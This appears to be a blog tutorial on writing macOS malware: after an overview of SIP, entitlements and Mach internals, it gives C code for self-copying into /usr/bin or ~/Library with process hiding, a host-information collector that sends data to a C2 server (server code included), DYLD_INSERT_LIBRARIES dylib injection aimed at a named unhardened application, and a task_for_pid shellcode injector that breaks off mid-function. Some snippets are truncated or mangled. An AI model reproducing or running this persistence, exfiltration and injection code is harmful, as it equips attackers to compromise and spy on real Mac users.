In this article, we’ll delve into the world of designing and developing malware for macOS, which is essentially a Unix-based operating system. We’ll take a classic approach to exploring Apple’s internals. All you need is a basic understanding of exploitation, along with knowledge of C and Python programming, as well as some familiarity with low-level assembly language to grasp the details here. While the topics discussed may be advanced, I’ll do my best to present them smoothly.

Let’s start by understanding the macOS architecture and its security features. We’ll then delve into the internals, covering key elements like the Mach API and kernel, and we’ll walk through some basic system calls and examples that are easy to understand. Next, we’ll introduce a dummy malware. Later on, we’ll explore code injection techniques and how they’re utilized in malware, We’ll also touch on persistence methods. To conclude, we’ll demonstrate a basic implementation of a shellcode injection. Throughout, we’ll provide a detailed, step-by-step breakdown of the code and techniques involved.


a little background from the internet, The Mac OS X kernel (xnu) is an operating system kernel with a unique lineage, merging the research-oriented Mach microkernel with the more traditional and contemporary FreeBSD monolithic kernel. The Mach microkernel combines a potent abstraction—Mach message-based interprocess communication (IPC)—with several cooperating servers to constitute the core of an operating system. Responsible for managing separate tasks within their own address spaces and comprising multiple threads, the Mach microkernel also features default servers that offer services like virtual memory paging and system clock management.

However, the Mach microkernel alone lacks crucial functionalities such as user management, file systems, and networking. To address this, the Mac OS X kernel incorporates a graft of the FreeBSD kernel, specifically its top-half (system call handlers, file systems, networking, etc.), ported to run atop the Mach microkernel. To mitigate performance concerns related to excessive IPC messaging between kernel components, both kernels reside in the same privileged address space. Nevertheless, the Mach API accessible from kernel code remains consistent with the Mach API available to user processes.

Before delving into macOS development, it’s crucial to grasp the fundamentals of the operating system. In this discussion, we’ll primarily focus on understanding the security protections, particularly System Integrity Protection (SIP),

SIP serves as a vital security feature designed to safeguard critical system files, directories, and processes from unauthorized modification or tampering by applications. It imposes restrictions on write access to protected system locations, even for processes with root privileges, thus preventing unauthorized alterations. Moreover, SIP implements additional security measures for system extensions and kernel drivers. For instance, kernel extensions are required to be signed by Apple or by developers using a valid Developer ID. This stringent requirement ensures that only trusted extensions are permitted to load into the kernel, bolstering the overall security of the system.

As we can see, SIP (System Integrity Protection) is turned on, indicating that the system is benefiting from its security features. The presence of the “restricted” flag on certain directories highlights SIP’s protection of those specific areas. It’s important to note that SIP’s shielding may not extend to subdirectories within a SIP-protected directory.

To overcome this limitation, Firmlinks come into play. These allow certain directories to be “firmlinked,” which are special symbolic links protected by SIP. This ensures their functionality even in SIP-protected locations, enhancing compatibility, Which operate seamlessly, allowing applications and scripts to treat them as regular symbolic links without any special handling. This enables the creation of symbolic links in directories like /usr, /bin, /sbin, and /etc, which were previously inaccessible due to SIP.

By making use of firmlinks, developers and users can address compatibility challenges while still enjoying the security advantages of SIP. It strikes a balance between system protection and accommodating the needs of applications and scripts that rely on symbolic links in macOS. The use of firmlinks allows for access and modification of certain directories, even in traditionally protected locations. For instance, a firmlink can grant write access to /usr/local, providing flexibility for installing and managing software and scripts in that directory.

Now, onto Entitlements, Entitlements are permissions granted to applications on macOS, dictating their level of access and capabilities within the system. They control the application’s ability to interact with various system resources, including the network, file system, hardware, and user privacy-related information. By granting specific entitlements, macOS ensures that applications have the necessary permissions to perform their intended tasks while maintaining system integrity and protecting user privacy.

Entitlements are typically stored in the application’s Info.plist file, which is located within the .app bundle. The Info.plist file contains metadata and configuration details about the application, and it includes key-value pairs representing the entitlements. Each entitlement is represented by a key, denoting the specific permission or access level, and a value that defines its corresponding setting.

  • For example, an entitlement entry in the Info.plist file may appear as follows:

In this case, the entitlement with the key “” indicates that the application has permission to act as a network client, granting it access to network resources.

  • We can obtain entitlements of an application by using the following command:
codesign --display --entitlements - /path/to/

The specific entitlements and their corresponding keys and values can vary based on the application’s requirements and the resources it needs to access. By defining entitlements, macOS ensures that applications operate within predefined boundaries, promoting security, privacy, and controlled access to system resources.

Now, let’s talk about Property List (plist) files. file format used on macOS to store structured data, such as configuration settings, preferences, and metadata. They have a hierarchical structure with key-value pairs and support various data types. Property list files can be in XML or binary format.

In the context of macOS, property list files are commonly used for storing application metadata, entitlements, sandboxing settings, and code signing details. For example:

  • Entitlements: Property list files, like the Info.plist, can contain entitlements that grant permissions to applications, specifying their access to system resources.
  • Sandbox: Property list files define sandbox settings that restrict an application’s access to resources, enhancing security and protecting user privacy.
  • Code Signing: Property list files store information related to code signing, verifying the authenticity and integrity of an application.

Property List (plist) files can hold various data types and have a hierarchical structure. Here are some commonly used data types and an example of the plist file structure:

  1. Data Types:
    • String: A sequence of characters.
    • Number: Represents numeric values, including integers and floating-point numbers.
    • Boolean: Represents true or false values.
    • Date: Represents a specific date and time.
    • Array: An ordered collection of values.
    • Dictionary: A collection of key-value pairs, where each key is unique.

Here’s an example of a plist file structure:

<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">

In this example, the property list file contains a dictionary with several entitlement keys related to sandboxing. Each key represents a specific entitlement, and the value <true/> indicates that the corresponding entitlement is enabled.

The three entitlements mentioned in this example are:

  • Enables sandboxing for the application.
  • Allows read-only access to user-selected files.
  • Grants the application permission to act as a network client.

This simplified example demonstrates how property list files can store entitlements related to sandboxing, providing a structured format for specifying the application’s access and permissions within the sandbox environment.

  • We can use otool to read Info.plist in different formats:
plutil -convert xml1 /Applications/ -o - 
plutil -convert json /Applications/ -o - 

Overall, property list files play a crucial role in macOS by providing a structured and standardized format to store important information related to entitlements, sandboxing, code signing, and more. They enable applications and system components to access and manage this data efficiently, contributing to the security and integrity of the macOS ecosystem.

That’s all we need to know for now. There’s more to explore, such as Sandboxing, App Bundles, and so on, but these are the most important security mechanisms that matter to us for development. Now let’s delve a bit deeper and discuss internal architecture. Why focus on internals? Well, even though I’m not planning to develop a rootkit or anything as advanced, it’s crucial to understand the OS as thoroughly as possible from a developer’s perspective. After all, we’re writing software.

Let’s take a quick look at Mach. Initially designed as a communication-centric operating system kernel with robust multiprocessing support, Mach aimed to lay the groundwork for various operating systems. It favored a microkernel architecture, aiming to keep essential OS services like file systems, I/O, memory management, networking, and different OS personalities separate from the kernel.

XNU, whimsically named “X is not UNIX,” serves as the kernel for Mac OS X. Positioned at the core, Darwin and the rest of the OS X software stack rely on the XNU kernel.

XNU stands out as a hybrid operating system, blending a hardware/Io tasking interface from the minimalist Mach microkernel with elements from FreeBSD kernel and its POSIX-compliant API. Understanding how programs map to processes in virtual memory on OS X can be a bit tricky due to overlapping definitions. For example, the term “thread” could refer to either the POSIX API pthreads from BSD or the fundamental unit of execution within a Mach task. Moreover, there are two distinct sets of syscalls, each mapped to positive (Mach) or negative (BSD) numbers.

Mach provides a virtual machine interface, abstracting system hardware—a common feature in many operating systems. Its core kernel is designed to be simple and extensible, boasting an Inter-Process Communication (IPC) mechanism that underpins many kernel services. Notably, Mach seamlessly integrates IPC capabilities with its virtual memory subsystem, leading to optimizations and simplifications across the OS.

On OS X, we deal with “tasks” rather than processes. Tasks, similar to processes, serve as OS-level abstractions containing all the resources needed to execute a program. Technically, Mach refers to its processes as tasks, although the concept of a BSD-style process that encapsulates a Mach task persists. Resources within a task include:

  • A virtual address space
  • Inter-process communication (IPC) port rights
  • One or more threads

“Ports” serve as an inter-task communication mechanism, using structured messages to transmit information between tasks. Operating solely in kernel space, ports act like P.O. Boxes, albeit with restrictions on message senders. Ports are identified by Task-specific 32-bit numbers.

Threads are units of execution scheduled by the kernel. OS X supports two thread types (Mach and pthread), depending on whether the code originates from user or kernel mode. Mach threads reside at the OS’s lowest level in kernel-mode, while pthreads from the BSD realm execute programs in user-mode. (More in this, later)

Mach redefines the traditional Unix notion of a process into two components: a task and a thread. In the kernel, a BSD process aligns with a Mach task. A task serves as a framework for executing threads, encapsulating resources and defining a program’s protection boundary. Mach ports, versatile abstractions, facilitate IPC mechanisms and resource operations.

IPC messages in Mach are exchanged between threads for communication, carrying actual data or pointers to out-of-line data. Message transfer is asynchronous, with port capabilities exchanged through messages.

Mach’s virtual memory system encompasses machine-independent components like address maps and memory objects, alongside machine-dependent elements like the physical map. Memory objects serve as containers for data mapped into a task’s address space, managed by various pagers handling distinct memory types. Exception ports, assigned to each task and thread, facilitate exception handling, allowing multiple handlers to suspend affected threads, process exceptions, and resume or terminate threads accordingly.

Let’s explore the basics of Mach System Calls, including retrieving system information and performing code injection. This will provide a fundamental understanding of interacting with macOS, By the way, a system call is a function of the kernel invoked by a user space. It can involve tasks like writing to a file descriptor or exiting a program. Typically, these system calls are wrapped by C functions in the standard library.

Baby Steps

If we head over to the Mach IPC Interface or Apple documentation we can find a Mach system call that’s pretty handy for getting basic info about the host system. It tells us stuff like how many CPUs there are, both maximum and available, the physical and logical CPUs, memory size, and the max memory size. This call is host_info(), and it’s super useful for getting details about a host, like what kind of processors are installed, how many are currently available, and the total memory size.

Now, like a lot of Mach “info” calls, host_info() needs a flavor argument to specify what kind of info you want. For instance:

kern_return_t host_info(host_t host, host_flavor_t flavor,
                        host_info_t host_info,
                        mach_msg_type_number_t host_info_count);
  • HOST_BASIC_INFO: Returns basic system information.
  • HOST_SCHED_INFO: Provides scheduler-related data.
  • HOST_PRIORITY_INFO: Offers scheduler-priority-related information.

Besides host_info(), other calls like host_kernel_version(), host_get_boot_info(), and host_page_size() can be employed to access miscellaneous system details.

int main() {
    kern_return_t kr; /* the standard return type for Mach calls */
    mach_port_t myhost;
    char kversion[256]; 
    host_basic_info_data_t hinfo;
    mach_msg_type_number_t count;
    vm_size_t page_size;

    // Retrieve System Information
    printf("Retrieving System Information...n");

    // Get send rights to the name port for the current host
    myhost = mach_host_self();

    // Get kernel version
    kr = host_kernel_version(myhost, kversion);
    EXIT_ON_MACH_ERROR("host_kernel_version", kr);

    // Get basic host information
    count = HOST_BASIC_INFO_COUNT; // size of the buffer
    kr = host_info(myhost, HOST_BASIC_INFO, (host_info_t)&hinfo, &count);
    EXIT_ON_MACH_ERROR("host_info", kr);

    // Get page size
    kr = host_page_size(myhost, &page_size);
    EXIT_ON_MACH_ERROR("host_page_size", kr);

    printf("Kernel Version: %sn", kversion);
    printf("Maximum CPUs: %dn", hinfo.max_cpus);
    printf("Available CPUs: %dn", hinfo.avail_cpus);
    printf("Physical CPUs: %dn", hinfo.physical_cpu);
    printf("Maximum Physical CPUs: %dn", hinfo.max_cpus);
    printf("Logical CPUs: %dn", hinfo.logical_cpu);
    printf("Maximum Logical CPUs: %dn", hinfo.logical_cpu);
    printf("Memory Size: %llu MBn", (unsigned long long)(hinfo.memory_size >> 20));
    printf("Maximum Memory: %llu MBn", (unsigned long long)(hinfo.max_mem >> 20));
    printf("Page Size: %u bytesn", (unsigned int)page_size);

    // Clean up and exit
    mach_port_deallocate(mach_task_self(), myhost);

So, basically, the code is pretty easy to understand. It just grabs system information and shows things like the Kernel version, right? It’s simple and harmless. But if we want to learn more about system calls, we need something different. How about something that acts more like malware? But let’s keep it simple at first. We can start by writing a code that write a copy of itself to either /usr/bin/ or /Library/.

To achieve this kind of behavior, we need to use task operations because we need to control another process and access system processes. I found specific Mach system calls like pid_for_task(), task_for_pid(), task_name_for_pid(), and mach_task_self(), which allow conversion between Mach task ports and Unix PIDs. However, they essentially bypass the capability model, which means they are restricted on macOS due to UID checks, entitlements, SIP, etc., limiting their use, and are not documented as part of a public API and are privileged, typically accessible only by processes with elevated privileges like root or members of the procview group. This limitation poses a challenge because malware would need elevated privileges or execution on a privileged account to work unless obtained through various means.

Thus, we can’t use task_for_pid on Apple platform binaries due to SIP. However, if permitted, we would have the port and could essentially do anything we want including what I’m about to explain. Therefore, So for this example we’ll use mach_task_self() as it typically does not require privileges. It retrieves information about the current task, depending on the security policies enforced.

int main(int argc, char *argv[]) {
  kern_return_t kr;
  task_t target_task;
  geteuid() != 0;
  kr = mach_task_self();

  struct stat st;
  if (stat("/usr/bin/", &st) == 0 && S_ISDIR(st.st_mode) &&
      access("/usr/bin/", W_OK) == 0) {
    // Write to /usr/bin/
    char buffer[BUF_SIZE];
    ssize_t bytes_read;
    int src_fd = open(argv[0], O_RDONLY);
    int dest_fd = open("/usr/bin/" MALWARE_NAME, O_WRONLY | O_CREAT | O_TRUNC,
                       S_IRUSR | S_IWUSR);
    while ((bytes_read = read(src_fd, buffer, sizeof(buffer))) > 0) {
      write(dest_fd, buffer, bytes_read);
  } else {
    // Fallback
    char home_malware_path[256];
    snprintf(home_malware_path, sizeof(home_malware_path), "%s/Library/%s",
             getenv("HOME"), MALWARE_NAME);
    char buffer[BUF_SIZE];
    ssize_t bytes_read;
    int src_fd = open(argv[0], O_RDONLY);
    int dest_fd = open(home_malware_path, O_WRONLY | O_CREAT | O_TRUNC,
                       S_IRUSR | S_IWUSR);
    while ((bytes_read = read(src_fd, buffer, sizeof(buffer))) > 0) {
      write(dest_fd, buffer, bytes_read);

  mach_port_deallocate(mach_task_self(), target_task);

If you take a look at the main function, you’ll see how we obtain the task port for the current process, or more precisely a send right to a task port, is basically just a send right to a Mach port for which the kernel owns the receive right. What makes a task port special is that when the kernel receives a message sent to a task port, rather than enqueueing the message, the kernel will perform an action on the corresponding task. This means that userspace processes can send messages to a task port in order to inspect or control the task using mach_task_self() and check if it has write access to /usr/bin/. If it fails to write to /usr/bin/, it copies itself to ~/Library/ (the user’s home directory) with a defined name.

As for hide_process() function called, it hides the child process from user interaction and prevents it from receiving signals from the terminal, it works by creating a child process using fork(), Remember the BSD part, exiting the parent process, and then detaching the child process from the controlling terminal using setsid().

This simply demonstrates a basic technique used by malware to hide itself on a system by copying itself to a system directory (/usr/bin/) or the user’s home directory (~/Library/) and then attempting to hide its process from detection.

This is far from being a malicious code, but it does provide us with valuable insights into working with the Mach API and conducting low-level system operations. Through this example, we’ve gained familiarity with essential concepts such as process management and communication.

0x100003e79 <+505>: callq  0x100003c50               ; hide_process
0x100003e7e <+510>: movq   0x17b(%rip), %rax         ; (void *)0x0000000000000000
0x100003e85 <+517>: movl   (%rax), %edi
0x100003e87 <+519>: movl   -0x18(%rbp), %esi
0x100003e8a <+522>: callq  0x100003ec6               ; symbol stub for: mach_port_deallocate
0x100003e8f <+527>: xorl   %edi, %edi
0x100003e91 <+529>: movl   %eax, -0x21ec(%rbp)
0x100003e97 <+535>: callq  0x100003eb4               ; symbol stub for: exit

Here we put a our little program into a debugger, and as you can see specially in the disassembly part there’s instructions correspond to our operation like /usr/bin/ also you can notice the cleanup operations are performed, such as deallocating port and exiting the program.

Let’s say, after infecting a new host or wanting to ensure our malware notifies us of its presence it sends information about the host, we opt for a straightforward approach “naive way.” This method might seem amateurish, a malware shouldn’t connect to a Command&Control server (C2) initially. However, since we’re just exploring macOS as a new territory, it’s a starting point, We collects system information such as the system name, release version, machine architecture, hardware model, user ID, home directory, …. It then sends this information to the C2.

For retrieving or modifying information about the system and environment, we can make use of sysctlbyname(). This function enables us to fetch specific system details, such as the hardware model, directly from the system kernel.

    // Get hardware model
    size_t len = BUF_SIZE;
    if (sysctlbyname("hw.model", &model, &len, NULL, 0) == 0) {
        send_data(sockfd, "nHardware Model: ");
        send_data(sockfd, model);
    } else {
        printf("ERROR: Failed to get hardware modeln");

When it comes to System Owner/User Discovery, we typically access user-related data through standard POSIX interfaces like getpwuid(). relying on standard POSIX interfaces, As discussed before,

void send_system_info(int sockfd) {
    struct utsname sys_info;
    char model[BUF_SIZE];
    char uid_str[BUF_SIZE];
    // Get system information
    if (uname(&sys_info) == 0) {
        send_data(sockfd, "nSystem Name: ");
        send_data(sockfd, sys_info.sysname);
        send_data(sockfd, "nRelease Version: ");
        send_data(sockfd, sys_info.release);
        send_data(sockfd, "nMachine Architecture: ");
        send_data(sockfd, sys_info.machine);
    } else {
        printf("ERROR: Failed to get system informationn");

    // Get user information
    uid_t uid = getuid();
    struct passwd *user_info = getpwuid(uid);
    if (user_info != NULL) {
        send_data(sockfd, "nUser ID: ");
        snprintf(uid_str, BUF_SIZE, "%d", user_info->pw_uid);
        send_data(sockfd, uid_str);
        send_data(sockfd, "nHome directory: ");
        send_data(sockfd, user_info->pw_dir);
        send_data(sockfd, "nLogin shell: ");
        send_data(sockfd, user_info->pw_shell);
        // Get primary group information
        struct group *group_info = getgrgid(user_info->pw_gid);
        if (group_info != NULL) {
            send_data(sockfd, "nPrimary group: ");
            send_data(sockfd, group_info->gr_name);
        } else {
            printf("ERROR: Failed to get primary group informationn");
    } else {
        printf("ERROR: Failed to get user informationn");

Simply providing a snapshot of the system and user environment is crucial for gathering information on potential targets. However, since malware typically only has one chance for infection, it needs to be self-reliant before attempting Phone Home. This is why the approach of using a dummy malware, primarily for testing and exploring options before developing an actual malware, is essential.

Nevertheless, deploying a dummy malware still provides attackers with a significant amount of information that could be leveraged for subsequent targeted attacks or exploiting vulnerabilities, whether in the kernel or userland.

You can rely on LOLBins (Living off the Land Binaries) for gathering host information, such as /usr/sbin/system_profiler -nospawn -detailLevel full. However, the catch is that such commands are visible and can be easily flagged. Despite this, it remains an easy and effective method for malware to extract details from the infected host.

Alright, So how do we transmit the data? Well, we use socket. This API allows us to send data to the connected endpoint, which in this case, is the Command & Control server. Data is sent in the form of strings. To ensure that the data is properly formatted and transmitted over the socket to the C2 server, we rely on functions like send() for sending data and file I/O functions such as popen() and fgets() for reliable reading and sending of data. It’s pretty simple.

The C2 server is also really simple, (up for the sole purpose of handling incoming connections), it won’t have any protection mechanism to hide itself from the system where it is running on. but this server is basic for demonstration only, I recommend encryption and a database in place to organize and also a generation of a temporary ID to associate to the instance.

The extraction module (ext) start an autonomous thread listening for incoming connections by malware instances. Once connected, the module will simply print on the standard output the content of the incoming connection (which are is the information extracted by the client).

// The server will keep listening for incoming connections indefinitely
while (1) {
    // Accept a new connection from a client
    cltlen = sizeof(cltaddr);
    cltfd = accept(dexft_fd, (struct sockaddr *) &cltaddr, &cltlen);

    // Check if the accept call was successful
    if (cltfd < 0) {
        // If accept failed, print an error message and continue listening
        printf("Failed to accept incoming connection, %dn", cltfd);

    // Print out information about the connected client
    printf("Collecting data from client %s:%d...n", inet_ntoa(cltaddr.sin_addr), ntohs(cltaddr.sin_port));

    // Receive data from the client and process it
    while ((br = recv(cltfd, buf, BUF_SIZE, 0)) > 0) {
        // Write the received data to the standard output
        fwrite(buf, 1, br, stdout);

    // Check if an error occurred during data reception
    if (br < 0) {
        printf("ERROR: Failed to receive data from client!n");

    // Close the client socket

return NULL;

As you can see, the code itself is quite simple yet functional. Once the client is executed, the server collects data from the connected clients, and then closes the connection before resuming listening for new connections.

Collecting data from client

System Name: Darwin
Release Version: 19.6.0
Machine Architecture: x86_64
Hardware Model: ....

User ID: 5..
Home directory: /Users/foo
Login shell: /bin/zsh

Obviously, This will get flagged in a sec, why you may ask? Well the behavior exhibited here it screams malware from establishing a connection to sending system information and continuously receiving and executing commands from a remote server, The network traffic pattern alone is a red flag, Plus, the transmission of system information immediately after connection establishment, I mean, However, this explanation provides a simple overview of how dummy malware can be used to as learning piece of code before developing actual malware. Next, we’ll delve into a topic that I find quite interesting .Yes, you guessed it;

Actually, exploring Code Injection deserves its own article, and I’ll include some resources at the end. However, for now, let’s focus on two techniques that I find quite effective. So, Let’s begin by introducing the first technique, which involves leveraging environment variables or DYLD_INSERT_LIBRARIES for code injection.

DYLD_INSERT_LIBRARIES is actually a powerful feature that allows users to preload dynamic libraries into applications, Both developers and attackers can inject code into running processes without modifying the original executable file is commonly used to intercept function calls, manipulate program behavior, or even introduce malicious functionality into legitimate application, As we gone see, It’s basically a colon separated list of dynamic libraries to load before the ones specified in the program. This lets you test new modules of existing dynamic shared libraries that are used in flat-namespace images by loading a temporary dynamic shared library with just the new modules.

In simple term’s, it will load any dylibs you specify in this variable before the program loads, essentially injecting a dylib into the application, So for example

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void foo() {
  printf("Dynamic library injected! n");
  system("/bin/bash -c 'echo Library injected!'");

As you can see we have a function foo() that prints to let us know that we successful injected a library and a system command that execute a shell to echo basically the same thing and that attribute((constructor)) marks the function run before the application’s main function, into which we injected the dylib, piece of cake right, But how do we know identify binaries vulnerable to environment variable injection, on that later, but first let’s just try it on one of our previous program, So just compile that code like any other program and run it.

~ > gcc -dynamiclib inject.c -o inject.dylib

~ > DYLD_INSERT_LIBRARIES=inject.dylib ./foo
Dynamic library injected!
Library injected!

et voilà, it’s affected, So what happens is that it loads any dylibs specified in this variable before the program loads, essentially injecting a dylib into the application, Which means privilege escalation right? but not so fast Apple platform binaries. As of macOS 10.14, third-party developers can opt in to a hardened runtime for their application, which can prevent the injection of dylibs using this technique, So basically we still can perform injection when the application is not defined as having a “Hardened Runtime” and therefore allows the injection of dylibs using the environment variable. Or, when the binary is using hardened runtime, and the developer released it with the appropriate entitlements:

  • The “Disable-library-validation” entitlement allows any dylib to run on the binary even without checking who signed the file and the library. This permission usually exists in programs that allow community-written plugins.
  • The entitlement loosens the hardened runtime restrictions and allows the use of DYLD_INSERT_LIBRARIES to inject a library.

Alright on possible target application, For example to run this on It won’t work, because is hardened and lacks the matching entitlement,

but that doesn’t mean that the application is not hardened, as there are other Hardened Runtime features that may not be reflected in the entitlements, So I speed up the process and I found that Veracrypt is not using Hardened Runtime, So I’m going to use it as an example for the whole article, sorry

So, let’s try to inject it, but first


static void customConstructor(int argc, const char **argv)
syslog(LOG_ERR, "Dylib injection successful in %sn", argv[0]);

So, We just print foo and logs a message using the syslog() function, that logs an error message indicating successful injection of a dynamic library (dylib) along with the name of the program, So let’s try it, And it seems that we’ve successfully loaded the library when we see the following output:

If we attempt to use DYLD_INSERT_LIBRARIES in another binary that is hardened and lacks the matching entitlement, we won’t be able to load the library, and consequently, we won’t see the desired output.

However, some internal components of macOS expect threads to be created using the BSD APIs and have all Mach thread structures and pthread structures set up properly. This can present challenges, especially with changes introduced in macOS 10.14.

I came across a piece of code inject.c that addresses this issue. Additionally, I highly recommend reading the “Mac Hacker’s Handbook” as it provides invaluable insights and includes some great examples of interprocess code injection.

Based on what I’ve understood, the transition from Mach thread APIs to pthread APIs in macOS, particularly concerning the initialization of thread structures, presents challenges. However, the discovery of the _pthread_create_from_mach_thread function provides a viable alternative for initializing pthread structures from bare Mach threads. This ensures compatibility and proper functioning of threaded applications across different macOS versions.

For those interested, I’ve included examples demonstrating how to inject code to call dlopen and load a dylib into a remote mach task: Gist 1 & Gist 2

Alright, let’s discuss the second technique. It’s similar to methods used on Windows, and one common approach is process injection which is the ability for one process to execute code in a different process. In Windows, one reason this is used is to evade detection by av, for example by a technique known as DLL hijacking. This allows malicious code to pretend to be part of a different executable. In macOS, this technique can have significantly more impact than that due to the difference in permissions two applications can have.

In the classic Unix security model, each process runs as a specific user. Each file has an owner, group and flags that determine which users are allowed to read, write or execute that file. Two processes running as the same user have the same permissions: it is assumed there is no security boundary between them. Users are security boundaries, processes are not. If two processes are running as the same user, then one process could attach to the other as a debugger, allowing it to read or write the memory and registers of that other process. The root user is an exception, as it has access to all files and processes. Thus, root can always access all data on the computer, whether on disk or in RAM.

This was, in essence, the same security model as macOS until the introduction of SIP, For example, certain files can no longer be read by the root user unless the process also has specific entitlements. The Unix ownership rules are still present, this is an additional layer of permission checks on top of them.

OS X Shellcode Injection

So, we’re going to write a simple shellcode injection program where the malware’s host process injects shellcode into the memory of a remote process. Let’s give it a shot, but first, let’s write a simple shellcode for testing purposes.

Writing 64-bit assembly on macOS differs somewhat from ELF. Here, you just need to understand the macOS executable file format, known as Mach-O., but I’ll just stick x86_64 architecture and we can later use linker for Mach-O executables, A simple Hello World program, WELL, as you know, we start by declaring two sections: .data and .text. The .data section is used for storing initialized data, while the .text section contains executable code. Then _main function as the entry point of the program, right? and a reference point in the code, that would be trick and followed by call which invokes the continue subroutine and pops the address of the string ‘Hello World!’, Also if you notice in code we have a system call at the end that exit our program, the first syscall is for writing data.

section .data
section .text

global _main

	jmp trick

	pop rsi            ; Pop string address into rsi
	mov rax, 0x2000004 ; System call write = 4
	mov rdi, 1         ; Write to standard out = 1
	mov rdx, 14        ; The size to write
	syscall            ; Invoke the kernel
	mov rax, 0x2000001 ; System call number for exit = 1
	mov rdi, 0         ; Exit success = 0
	syscall            ; Invoke the kernel
	call continue
	db "Hello World!", 0, 0

Alright, time to compile. I use NASM for assembling my code. Remember what I said about using the linker to create Mach-O executables? Well, after assembling the code with NASM, we need to link it using ld. This linker not only brings together the assembled code but also incorporates necessary system libraries.

~ > ./nasm -f macho64 Hello.asm -o hello.o && ld ./Hello.o -o Hello -lSystem -syslibroot `xcrun -sdk macosx --show-sdk-path`

~ > ./Hello
Hello World!

Pretty sophisticated, right? Now, to actually turn it into machine code that we can use for injection, it needs to be converted into a hexadecimal representation, which is a small series of bytes that represent executable machine-language code. This represents the exact sequence of instructions that the processor will execute, so for this we can just use objdump

~ > objdump -d ./Hello | grep '[0-9a-f]:'| grep -v 'file'| cut -f2 -d:| cut -f1-6 -d' '|tr -s ' '|tr 't' ' '| sed 's/ $//g'| sed 's/ /x/g'| paste -d '' -s | sed 's/^/"/'| sed 's/$/"/g'


but if you somehow, can’t extract the shellcode relying solely on objdump, you can always script kiddy a simple py, which parses the assembly output.

def extract_shellcode(objdump_output): shellcode = "" length = 0 lines = objdump_output.split('n') for line in lines: if re.match("^[ ]*[0-9a-f]*:.*$", line): line = line.split(":")[1].lstrip() x = line.split("t") opcode = re.findall("[0-9a-f][0-9a-f]", x[0]) for i in opcode: shellcode += "x" + i length += 1 return shellcode, length def main(): objdump_output = shellcode, length = extract_shellcode(objdump_output) if shellcode == "": print("Bad") else: print("n" + shellcode) if __name__ == "__main__": main()

But does the shellcode work? I hope so 🙂 Nah, to ensure its functionality, we should test whether we can perform a simple injection. We can compile the shellcode, stored as a global variable, into the executable’s __TEXT,__text section by declaring it as a variable within the code, a simple example:

const char output[] __attribute__((section("__TEXT,__text"))) =  "

typedef int (*funcPtr)();

int main(int argc, char **argv)
    funcPtr ret = (funcPtr) output;

    return 0;

Alright, now that we have the shellcode, it’s time to write the actual injector. So, let’s start by writing the main function. I don’t know why, but it just feels like the natural starting point. The logic is simple: we take a single command-line argument, which should be the process ID (PID) of the target process to inject the shellcode into, right? Then, we obtain a handle to our victim task using task_for_pid(). Next, we’ll allocate a memory buffer in the remote task with mach_vm_allocate(). After that, we’ll write our shellcode to the remote buffer with mach_vm_write(). We’ll modify the memory permissions of the remote buffer with mach_vm_protect(). Then, we’ll update the remote thread context to point to the start of the shellcode with thread_create_running(). Finally, we’ll run our shellcode, which will print “Hello World”.

So, Remember our earlier discussion about the differences between a Mach task thread and a BSD pthread? and the task_for_pid() API call. So in order to develop a utility that utilizes task_for_pid(), you’ll need to create an Info.plist file. This file will be embedded into your executable and will enable code signing with the key set to “allow”. Below is an example of the Info.plist

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">

Note: not all sections of a program’s virtual memory permit their contents to be interpreted as code by the CPU (i.e., “marked executable”). Memory can be marked as readable (R), writable (W), executable (E), or some combination of the three. For instance, a page marked RW means one can read/write to these addresses in memory, but their contents may not be treated as executable by the CPU. This is a crucial aspect of memory protection and security in modern operating systems.

Executable memory regions are typically marked with the execute (E) permission, allowing the CPU to interpret the contents of these regions as machine instructions and execute them. This is essential for running programs, as the CPU needs to fetch instructions from memory and execute them.

However, allowing arbitrary memory regions to be executable can pose significant security risks, such as buffer overflow attacks or injection of malicious code. Therefore, modern operating systems employ memory protection mechanisms to restrict the execution of code to specific, authorized regions of memory.

By controlling the permissions of memory pages, operating systems can enforce security policies and prevent unauthorized execution of code. For example, writable memory regions that contain data should not be executable to prevent the execution of injected malicious code. Conversely, executable code should not be writable to prevent tampering with the program’s instructions.

Alright, the entry point we converts the PID provided as a string to an integer and calls the inject_shellcode function to inject the shellcode into the target process using the provided PID,

We need to interact with the target process, so we declare a few variables to hold essential information. These include remote_task to represent the task port of the target process, remote_stack to store the address of the allocated memory for the remote stack within the target process, and shellcode_region to keep track of the memory region allocated for the shellcode.

Now, the process begins. We need to get permission to access the target process, so we use the task_for_pid function to obtain the task port. This allows us to manipulate the memory and threads of the target process.

With access granted, we proceed to allocate memory within the target process. We reserve space for both the remote stack and the shellcode using mach_vm_allocate. This ensures that we have a place to execute our code.

Once memory is allocated, we write our shellcode into the allocated memory space of the target process using mach_vm_write. This effectively places our code where it needs to be executed.

int inject_shellcode(pid_t pid, unsigned char *shellcode, size_t shellcode_size) {
    task_t remote_task;
    mach_vm_address_t remote_stack = 0;
    vm_region_t shellcode_region;
    mach_error_t kr;

    // Get the task port for the target process
    kr = task_for_pid(mach_task_self(), pid, &remote_task);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to get the task port for the target process: %sn", mach_error_string(kr));
        return -1;

    // Allocate memory for the stack in the target process
    kr = mach_vm_allocate(remote_task, &remote_stack, STACK_SIZE, VM_FLAGS_ANYWHERE);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to allocate memory for remote stack: %sn", mach_error_string(kr));
        return -1;

    // Allocate memory for the shellcode in the target process
    kr = mach_vm_allocate(remote_task, &shellcode_region.addr, shellcode_size, VM_FLAGS_ANYWHERE);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to allocate memory for remote code: %sn", mach_error_string(kr));
        return -1;
    shellcode_region.size = shellcode_size;
    shellcode_region.prot = VM_PROT_READ | VM_PROT_EXECUTE;

    // Write the shellcode to the allocated memory in the target process
    kr = mach_vm_write(remote_task, shellcode_region.addr, (vm_offset_t)shellcode, shellcode_size);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to write shellcode to remote process: %sn", mach_error_string(kr));
        return -1;

    // Adjust memory permissions for the shellcode
    kr = vm_protect(remote_task, shellcode_region.addr, shellcode_region.size, FALSE, shellcode_region.prot);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to set memory permissions for remote code: %sn", mach_error_string(kr));
        return -1;

    // Create a remote thread to execute the shellcode
    x86_thread_state64_t thread_state;
